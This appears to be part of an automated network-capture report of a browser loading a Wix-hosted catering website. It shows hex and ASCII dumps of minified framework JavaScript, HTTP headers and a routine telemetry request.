                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 3d 76 6f 69 64 20 30 2c 68 2b 2b 3b 76 6f 69 64 20 30 21 3d 3d 6f 3b 29 7b 76 61 72 20 72 3d 6f 2e 6f 3b 69 66 28 6f 2e 6f 3d 76 6f 69 64 20 30 2c 6f 2e 66 26 3d 2d 33 2c 21 28 38 26 6f 2e 66 29 26 26 63 28 6f 29 29 74 72 79 7b 6f 2e 63 28 29 7d 63 61 74 63 68 28 6f 29 7b 69 7c 7c 28 74 3d 6f 2c 69 3d 21 30 29 7d 6f 3d 72 7d 7d 69 66 28 68 3d 30 2c 66 2d 2d 2c 69 29 74 68 72 6f 77 20 74 7d 7d 76 61 72 20 73 3d 76 6f 69 64 20 30 3b 76 61 72 20 65 3d 76 6f 69 64 20 30 2c 66 3d 30 2c 68 3d 30 2c 76 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 73 29 7b 76 61 72 20 69 3d 74 2e 6e 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 69 2e 74 21 3d 3d 73 29 72 65 74 75 72 6e 20 69 3d 7b 69 3a 30 2c 53 3a 74 2c 70 3a 73 2e 73
                                                                                                                                                                                                                        Data Ascii: =void 0,h++;void 0!==o;){var r=o.o;if(o.o=void 0,o.f&=-3,!(8&o.f)&&c(o))try{o.c()}catch(o){i||(t=o,i=!0)}o=r}}if(h=0,f--,i)throw t}}var s=void 0;var e=void 0,f=0,h=0,v=0;function u(t){if(void 0!==s){var i=t.n;if(void 0===i||i.t!==s)return i={i:0,S:t,p:s.s
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 74 29 7b 74 68 69 73 2e 78 3d 74 2c 74 68 69 73 2e 75 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 73 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 6f 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 66 3d 33 32 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 74 29 7b 76 61 72 20 69 3d 6e 65 77 20 62 28 74 29 3b 74 72 79 7b 69 2e 63 28 29 7d 63 61 74 63 68 28 74 29 7b 74 68 72 6f 77 20 69 2e 64 28 29 2c 74 7d 72 65 74 75 72 6e 20 69 2e 64 2e 62 69 6e 64 28 69 29 7d 64 2e 70 72 6f 74 6f 74 79 70 65 2e 62 72 61 6e 64 3d 72 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 21 3d 3d 74 26 26 76 6f 69 64
                                                                                                                                                                                                                        Data Ascii: )}function b(t){this.x=t,this.u=void 0,this.s=void 0,this.o=void 0,this.f=32}function O(t){var i=new b(t);try{i.c()}catch(t){throw i.d(),t}return i.d.bind(i)}d.prototype.brand=r,d.prototype.h=function(){return!0},d.prototype.S=function(t){this.t!==t&&void
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 69 2b 2b 29 7d 63 61 74 63 68 28 74 29 7b 74 68 69 73 2e 76 3d 74 2c 74 68 69 73 2e 66 7c 3d 31 36 2c 74 68 69 73 2e 69 2b 2b 7d 72 65 74 75 72 6e 20 73 3d 74 2c 79 28 74 68 69 73 29 2c 74 68 69 73 2e 66 26 3d 2d 32 2c 21 30 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 68 69 73 2e 74 29 7b 74 68 69 73 2e 66 7c 3d 33 36 3b 66 6f 72 28 76 61 72 20 69 3d 74 68 69 73 2e 73 3b 76 6f 69 64 20 30 21 3d 3d 69 3b 69 3d 69 2e 6e 29 69 2e 53 2e 53 28 69 29 7d 64 2e 70 72 6f 74 6f 74 79 70 65 2e 53 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 55 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 74 26 26 28 64 2e 70
                                                                                                                                                                                                                        Data Ascii: i++)}catch(t){this.v=t,this.f|=16,this.i++}return s=t,y(this),this.f&=-2,!0},l.prototype.S=function(t){if(void 0===this.t){this.f|=36;for(var i=this.s;void 0!==i;i=i.n)i.S.S(i)}d.prototype.S.call(this,t)},l.prototype.U=function(t){if(void 0!==this.t&&(d.p
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC664INData Raw: 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 22 29 2c 65 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 72 2e 5f 5f 53 45 43 52 45 54 5f 49 4e 54 45 52 4e 41 4c 53 5f 44 4f 5f 4e 4f 54 5f 55 53 45 5f 4f 52 5f 59 4f 55 5f 57 49 4c 4c 5f 42 45 5f 46 49 52 45 44 2e 52 65 61 63 74 43 75 72 72 65 6e 74 4f 77 6e 65 72 2c 68 3d 7b 6b 65 79 3a 21 30 2c 72 65 66 3a 21 30 2c 5f 5f 73 65 6c 66 3a 21 30 2c 5f 5f 73 6f 75 72 63 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 69 2c 6f 29 7b 76 61 72 20 72 2c 73 3d 7b 7d 2c 76 3d 6e 75 6c 6c 2c 75 3d 6e 75 6c 6c 3b 66 6f 72 28 72 20 69 6e 20 76 6f 69 64 20 30 21 3d 3d 6f 26 26 28 76 3d 22 22 2b 6f 29 2c 76 6f 69 64 20 30 21 3d 3d 69 2e 6b 65 79 26 26 28 76 3d
                                                                                                                                                                                                                        Data Ascii: eact.fragment"),e=Object.prototype.hasOwnProperty,f=r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,h={key:!0,ref:!0,__self:!0,__source:!0};function v(t,i,o){var r,s={},v=null,u=null;for(r in void 0!==o&&(v=""+o),void 0!==i.key&&(v=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        41192.168.2.54976134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC626OUTGET /services/wix-thunderbolt/dist/group_4.4a5c74ed.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1111INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 34643
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: mioIncoVyJ54KgF5RvY3HlAQ5wHlpXAT
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 115203123 5376332
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:08:22 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 27857
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:15 GMT
                                                                                                                                                                                                                        ETag: "5fd90faf2c188202d6c4d15bafeeb084"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC279INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 34 36 39 5d 2c 7b 31 38 34 34 37 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 4f 6e 4c 69 6e 6b 43 6c 69 63 6b 53 79 6d 62 6f 6c 3a 28 29 3d 3e 6e 2e 63 37 2c 50 72 65 76 69 65 77 54 6f 6f 6c 74 69 70 43 61 6c 6c 62 61 63 6b 3a 28 29 3d 3e 66 2c 50 72 65 76 69 65 77 54 6f 6f 6c 74 69 70 43 61 6c 6c 62 61 63 6b 53 79 6d 62 6f 6c 3a 28 29 3d 3e 6e 2e 70 4b 2c 6e 61 6d 65 3a 28 29 3d 3e 6e 2e 55 55 2c 73 69 74 65 3a 28
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[6469],{18447:(e,t,r)=>{"use strict";r.r(t),r.d(t,{OnLinkClickSymbol:()=>n.c7,PreviewTooltipCallback:()=>f,PreviewTooltipCallbackSymbol:()=>n.pK,name:()=>n.UU,site:(
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 72 28 37 37 37 34 38 29 2c 61 3d 72 28 33 32 31 36 36 29 2c 69 3d 72 28 38 32 36 35 38 29 2c 73 3d 72 28 34 31 35 39 34 29 2c 6c 3d 72 2e 6e 28 73 29 3b 63 6f 6e 73 74 20 64 3d 28 30 2c 6f 2e 4f 67 29 28 5b 61 2e 52 56 2c 6e 2e 63 37 2c 61 2e 54 51 5d 2c 28 28 65 2c 7b 6f 6e 4c 69 6e 6b 43 6c 69 63 6b 3a 74 7d 2c 72 29 3d 3e 28 7b 61 70 70 44 69 64 4d 6f 75 6e 74 3a 28 29 3d 3e 7b 69 66 28 21 28 30 2c 69 2e 66 55 29 28 65 29 29 72 65 74 75 72 6e 20 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 74 29 2c 72 2e 6d 6f 64 65 2e 64 65 62 75 67 26 26 6c 28 29 2e 76 65 72 73 69 6f 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 31 38 22 29 26 26 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63
                                                                                                                                                                                                                        Data Ascii: r(77748),a=r(32166),i=r(82658),s=r(41594),l=r.n(s);const d=(0,o.Og)([a.RV,n.c7,a.TQ],((e,{onLinkClick:t},r)=>({appDidMount:()=>{if(!(0,i.fU)(e))return e.addEventListener("click",t),r.mode.debug&&l().version.startsWith("18")&&Array.from(document.querySelec
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 28 74 2e 68 61 6e 64 6c 65 43 6c 69 63 6b 28 73 29 29 72 65 74 75 72 6e 20 69 3d 21 31 2c 75 26 26 6e 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 76 6f 69 64 20 6e 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 7d 7d 3b 70 28 5b 2e 2e 2e 72 2c 2e 2e 2e 6f 5d 29 2c 70 28 5b 2e 2e 2e 61 2c 74 5d 29 2c 21 75 26 26 69 26 26 6c 26 26 77 69 6e 64 6f 77 3f 2e 6f 70 65 6e 28 6c 2c 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 72 67 65 74 22 29 7c 7c 22 5f 73 65 6c 66 22 29 7d 2c 72 65 67 69 73 74 65 72 50 61 67 65 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3a 28 65 2c 74 29 3d 3e 7b 22 6d 61 73 74 65 72 50 61 67 65 22 3d 3d 3d 74 3f 6f 2e 70 75 73 68 28 65 29 3a 61 2e 70 75 73 68 28 65 29 7d 7d 7d 29 29 2c 66 3d 28 30 2c 6f 2e 4f 67 29 28 5b 5d
                                                                                                                                                                                                                        Data Ascii: (t.handleClick(s))return i=!1,u&&n.preventDefault(),void n.stopPropagation()}};p([...r,...o]),p([...a,t]),!u&&i&&l&&window?.open(l,s.getAttribute("target")||"_self")},registerPageClickHandler:(e,t)=>{"masterPage"===t?o.push(e):a.push(e)}}})),f=(0,o.Og)([]
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 6f 6e 73 74 20 61 3d 61 77 61 69 74 20 72 2e 6c 6f 61 64 28 6e 29 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2c 69 3d 28 30 2c 64 2e 56 29 28 65 29 2c 73 3d 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 28 30 2c 75 2e 66 6c 61 74 74 65 6e 29 28 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 61 29 2e 6d 61 70 28 28 28 5b 65 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 3a 72 7d 5d 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 72 2e 73 74 61 72 74 73 57 69 74 68 28 22 70 6c 61 74 66 6f 72 6d 2e 62 75 69 6c 64 65 72 22 29 3f 22 70 6c 61 74 66 6f 72 6d 2e 62 75 69 6c 64 65 72 22 3a 72 3b 69 66 28 21 69 5b 6e 5d 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 6f 6e 73 74 20 6f 3d 74 2e 67 65 74 28 65 29 3b 72 65 74 75 72 6e 20 69 5b 6e 5d 2e 6d 61 70 28 28 28 7b 63 6f 6d 70 6f 6e
                                                                                                                                                                                                                        Data Ascii: onst a=await r.load(n).components,i=(0,d.V)(e),s=await Promise.all((0,u.flatten)(Object.entries(a).map((([e,{componentType:r}])=>{const n=r.startsWith("platform.builder")?"platform.builder":r;if(!i[n])return null;const o=t.get(e);return i[n].map((({compon
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 63 6f 6d 70 49 64 3a 61 7d 3d 65 3b 69 66 28 65 2e 77 69 64 67 65 74 49 64 29 72 65 74 75 72 6e 20 76 6f 69 64 28 6e 5b 65 2e 77 69 64 67 65 74 49 64 5d 3d 21 30 29 3b 6c 65 74 20 69 3d 74 3b 63 6f 6e 73 74 20 73 3d 72 2e 67 65 74 28 61 29 3b 69 66 28 73 29 7b 63 6f 6e 73 74 7b 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 3a 65 2c 75 69 54 79 70 65 3a 74 7d 3d 73 3b 69 3d 74 3f 60 24 7b 65 7d 5f 24 7b 74 7d 60 3a 65 7d 6f 5b 69 5d 3d 21 30 7d 29 29 2c 74 2e 6d 65 74 65 72 28 22 63 6f 6d 70 6f 6e 65 6e 74 73 2d 75 6e 64 65 72 2d 66 6f 6c 64 22 2c 7b 63 75 73 74 6f 6d 50 61 72 61 6d 73 3a 7b 63 6f 6d 70 54 79 70 65 73 55 6e 64 65 72 46 6f 6c 64 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 2c 77 69 64 67 65 74 49 64 73 55 6e 64 65 72 46 6f 6c 64 3a 4f 62 6a 65 63
                                                                                                                                                                                                                        Data Ascii: compId:a}=e;if(e.widgetId)return void(n[e.widgetId]=!0);let i=t;const s=r.get(a);if(s){const{componentType:e,uiType:t}=s;i=t?`${e}_${t}`:e}o[i]=!0})),t.meter("components-under-fold",{customParams:{compTypesUnderFold:Object.keys(o),widgetIdsUnderFold:Objec
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 72 6f 6d 28 65 2e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 6e 28 74 29 29 29 3a 5b 5d 3b 72 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6f 2e 73 6f 6d 65 28 28 74 3d 3e 74 2e 63 6f 6e 74 61 69 6e 73 28 65 29 29 29 7c 7c 61 28 65 29 7d 29 29 7d 63 28 29 2e 6d 65 61 73 75 72 65 28 28 28 29 3d 3e 7b 72 28 29 7d 29 29 7d 28 74 29 29 7d 2c 61 3d 65 3d 3e 7b 63 6f 6e 73 74 20 72 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 70 29 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3b 63 28 29 2e 6d 75 74 61 74 65 28 28 28 29 3d 3e 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 70 2c 60 24 7b 72 7d
                                                                                                                                                                                                                        Data Ascii: rom(e.document.querySelectorAll(n(t))):[];r.forEach((e=>{o.some((t=>t.contains(e)))||a(e)}))}c().measure((()=>{r()}))}(t))},a=e=>{const r=e.getAttribute(p)||e.getAttribute("tabindex");c().mutate((()=>{e.setAttribute("tabindex","-1"),e.setAttribute(p,`${r}
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 65 42 61 63 6b 67 72 6f 75 6e 64 22 2c 22 48 6f 76 65 72 42 6f 78 22 2c 22 53 65 63 74 69 6f 6e 22 2c 22 48 65 61 64 65 72 53 65 63 74 69 6f 6e 22 2c 22 46 6f 6f 74 65 72 53 65 63 74 69 6f 6e 22 2c 22 4c 69 6e 6b 42 61 72 22 2c 22 54 65 78 74 4d 61 73 6b 22 2c 22 4d 61 74 72 69 78 47 61 6c 6c 65 72 79 22 2c 22 50 61 67 69 6e 61 74 65 64 47 72 69 64 47 61 6c 6c 65 72 79 22 2c 22 53 6c 69 64 65 72 47 61 6c 6c 65 72 79 22 2c 22 53 6c 69 64 65 53 68 6f 77 47 61 6c 6c 65 72 79 22 5d 2c 6c 3d 28 65 2c 7b 62 61 73 65 4d 65 64 69 61 55 72 6c 3a 74 2c 69 73 53 45 4f 42 6f 74 3a 72 7d 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 2f 5e 5b 61 2d 7a 5d 2b 3a 2f 3b 72 65 74 75 72 6e 7b 67 65 74 50 6c 61 63 65 68 6f 6c 64 65 72 3a 28 7b 66 69 74 74 69 6e 67 54 79 70 65 3a 6f 2c
                                                                                                                                                                                                                        Data Ascii: eBackground","HoverBox","Section","HeaderSection","FooterSection","LinkBar","TextMask","MatrixGallery","PaginatedGridGallery","SliderGallery","SlideShowGallery"],l=(e,{baseMediaUrl:t,isSEOBot:r})=>{const n=/^[a-z]+:/;return{getPlaceholder:({fittingType:o,
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 29 3d 3e 57 2e 71 71 2c 67 65 74 55 72 6c 48 61 73 68 3a 28 29 3d 3e 55 2e 4d 24 2c 6b 65 65 70 49 6e 74 65 72 6e 61 6c 51 75 65 72 79 50 61 72 61 6d 73 4f 6e 6c 79 3a 28 29 3d 3e 79 2e 52 2c 72 65 6d 6f 76 65 50 72 6f 74 6f 63 6f 6c 3a 28 29 3d 3e 55 2e 62 35 2c 72 65 6d 6f 76 65 51 75 65 72 79 50 61 72 61 6d 73 3a 28 29 3d 3e 55 2e 62 37 2c 72 65 6d 6f 76 65 55 72 6c 48 61 73 68 3a 28 29 3d 3e 55 2e 4b 33 2c 72 65 70 6c 61 63 65 50 72 6f 74 6f 63 6f 6c 3a 28 29 3d 3e 55 2e 72 77 2c 72 65 73 6f 6c 76 65 55 72 6c 3a 28 29 3d 3e 79 2e 4f 2c 73 69 74 65 3a 28 29 3d 3e 72 65 7d 29 3b 76 61 72 20 6e 3d 72 28 37 31 30 38 35 29 2c 6f 3d 72 28 33 32 31 36 36 29 2c 61 3d 72 28 31 36 35 33 37 29 2c 69 3d 72 28 31 32 34 38 32 29 2c 73 3d 72 28 37 35 33 39 36 29 2c
                                                                                                                                                                                                                        Data Ascii: )=>W.qq,getUrlHash:()=>U.M$,keepInternalQueryParamsOnly:()=>y.R,removeProtocol:()=>U.b5,removeQueryParams:()=>U.b7,removeUrlHash:()=>U.K3,replaceProtocol:()=>U.rw,resolveUrl:()=>y.O,site:()=>re});var n=r(71085),o=r(32166),a=r(16537),i=r(12482),s=r(75396),
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 2c 4f 2e 75 70 64 61 74 65 43 75 72 72 65 6e 74 52 6f 75 74 65 49 6e 66 6f 28 65 29 2c 41 2e 70 75 73 68 55 72 6c 53 74 61 74 65 28 65 2e 70 61 72 73 65 64 55 72 6c 2c 74 29 3b 63 6f 6e 73 74 7b 63 6f 6e 74 65 78 74 49 64 3a 6f 2c 70 61 67 65 49 64 3a 61 7d 3d 65 3b 69 66 28 61 77 61 69 74 20 52 28 7b 70 61 67 65 49 64 3a 61 2c 63 6f 6e 74 65 78 74 49 64 3a 6f 7d 29 2c 73 2e 69 73 46 69 72 73 74 4e 61 76 69 67 61 74 69 6f 6e 28 29 29 7b 63 6f 6e 73 74 20 65 3d 21 31 3b 65 26 26 45 2e 70 68 61 73 65 53 74 61 72 74 65 64 28 63 2e 63 2e 41 50 50 5f 57 49 4c 4c 5f 52 45 4e 44 45 52 5f 46 49 52 53 54 5f 50 41 47 45 29 2c 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 77 2e 6d 61 70 28 28 65 3d 3e 28 30 2c 62 2e 61 29 28 28 28 29 3d 3e 65 2e 61 70 70 57
                                                                                                                                                                                                                        Data Ascii: ,O.updateCurrentRouteInfo(e),A.pushUrlState(e.parsedUrl,t);const{contextId:o,pageId:a}=e;if(await R({pageId:a,contextId:o}),s.isFirstNavigation()){const e=!1;e&&E.phaseStarted(c.c.APP_WILL_RENDER_FIRST_PAGE),await Promise.all(w.map((e=>(0,b.a)((()=>e.appW
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 67 65 74 50 61 67 65 4e 75 6d 62 65 72 28 29 29 2c 48 28 43 2e 72 65 64 69 72 65 63 74 55 72 6c 29 29 3a 28 46 3d 30 2c 49 28 79 2c 43 2c 75 2e 77 34 2e 44 59 4e 41 4d 49 43 5f 52 45 44 49 52 45 43 54 2c 57 2c 45 2c 76 2e 67 65 74 50 61 67 65 4e 75 6d 62 65 72 28 29 29 2c 21 31 29 3b 69 66 28 46 3d 30 2c 43 3d 43 26 26 61 77 61 69 74 20 70 2e 68 61 6e 64 6c 65 28 43 29 2c 43 3d 43 26 26 61 77 61 69 74 20 6c 2e 68 61 6e 64 6c 65 28 43 29 2c 43 3d 43 26 26 61 77 61 69 74 20 66 2e 68 61 6e 64 6c 65 28 43 29 2c 43 3d 43 26 26 61 77 61 69 74 20 68 2e 68 61 6e 64 6c 65 28 43 29 2c 21 43 29 72 65 74 75 72 6e 20 49 28 79 2c 43 2c 75 2e 77 34 2e 4e 41 56 49 47 41 54 49 4f 4e 5f 45 52 52 4f 52 2c 57 2c 45 2c 76 2e 67 65 74 50 61 67 65 4e 75 6d 62 65 72 28 29 29 2c
                                                                                                                                                                                                                        Data Ascii: getPageNumber()),H(C.redirectUrl)):(F=0,I(y,C,u.w4.DYNAMIC_REDIRECT,W,E,v.getPageNumber()),!1);if(F=0,C=C&&await p.handle(C),C=C&&await l.handle(C),C=C&&await f.handle(C),C=C&&await h.handle(C),!C)return I(y,C,u.w4.NAVIGATION_ERROR,W,E,v.getPageNumber()),


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        42192.168.2.54976234.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC641OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 3252
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC3252OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 72 65 67 69 73 74 72 79 2f 63 6c 69 65 6e 74 5f 64 6f 77 6e 6c 6f 61 64 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"thunderbolt-components-registry/client_download","transactionAction"
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC865INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:52:39 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
